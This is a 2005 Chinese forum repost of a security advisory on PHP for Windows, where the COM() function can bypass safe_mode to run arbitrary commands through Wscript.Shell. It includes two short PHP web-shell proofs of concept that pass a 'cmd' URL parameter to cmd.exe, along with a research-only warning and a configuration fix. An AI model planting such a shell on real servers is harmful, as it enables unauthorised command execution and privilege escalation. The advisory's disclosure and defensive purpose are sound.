免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1192 | 回复: 0
打印 上一主题 下一主题

PHP COM组件调用绕过安全模式执行任意文件漏洞 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2005-05-04 02:51 |只看该作者 |倒序浏览
PHP COM组件调用绕过安全模式执行任意文件漏洞

创建时间:2005-03-22
文章提交:kevin1986 (kevin7c2_at_yahoo.com.cn)

发现日期:2005-02-10

受影响的系统:
Windows 下支持COM()函数的PHP版本

发现人:
Saiy\我非我 From http://www.wrsky.com & kEvin1986
Saiy:dawangs_at_etang.com
kEvin1986:Garnett1986_at_hotmail.com
我非我:wofeiwo_at_bugkidz.org

我非我:

描述:

Windows平台下的PHP脚本平台存在一个安全漏洞,使得PHP设置即使在安全模式下(safe_mode),仍旧允许攻击者使用COM()函数来创建系统组件来执行任意命令.
漏洞出现的原因是由于在安全模式下的PHP平台虽然system();pathru()函数被禁止,但是com.allow_dcom的设置依旧是为 true.以至于攻击者可以使用COM()函数创建系统组件对象来运行系统命令.如果是默认的Apache设置或者Web服务器以 Loacalsystem权限或Administrators权限运行,攻击者可以使用这个漏洞来提升权限.

测试程序:
-----------------------------------------------------------------

警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*需要Windows Script Host 5.6支持*/
<?php
$phpwsh=new COM("Wscript.Shell" or die("Create Wscript.Shell Failed!";
$phpexec=$phpwsh->;exec("cmd.exe /c $cmd";
$execoutput=$wshexec->;stdout();
$result=$execoutput->;readall();
echo $result;
?>;

/*Windows Script Host 5.6以下版本支持*/
<?php
$phpwsh=new COM("Wscript.Shell" or die("Create Wscript.Shell Failed!";
$phpwsh->;run("cmd.exe /c $cmd >; c:\\inetpub\\wwwroot\\result.txt";
?>;

将以上代码保存成*.php文件之后可以在浏览器中执行
http://www.target.com/simple.php?cmd=[Command]

---------------------------------------------------------------
补丁:
目前PHP官方未回复发现者的信件且未发布任何相关补丁.

建议:
在设置安全模式之后,将 com.allow_dcom=true 设置为 com.allow_dcom=false即可.

感谢:
www.4ngel.net安全小组的积极测试.
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP